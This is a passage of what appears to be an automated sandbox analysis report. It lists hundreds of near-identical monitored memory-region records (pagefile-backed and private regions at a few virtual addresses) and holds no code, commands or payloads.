entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10603 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10604 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10605 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10606 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10607 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10608 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10609 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10610 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10611 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10612 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10613 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10614 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10615 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10616 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10617 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10618 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10619 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10620 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10621 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10645 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10646 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10647 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10648 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10649 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10673 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10674 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10677 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 10678 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10698 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10699 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10703 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10704 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10705 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10706 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10719 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10724 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10725 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10726 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10727 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10728 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10729 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10730 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10731 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10746 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10747 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10759 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 10760 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 10761 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10762 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10763 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 10764 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10765 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10766 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10767 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10768 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 10786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 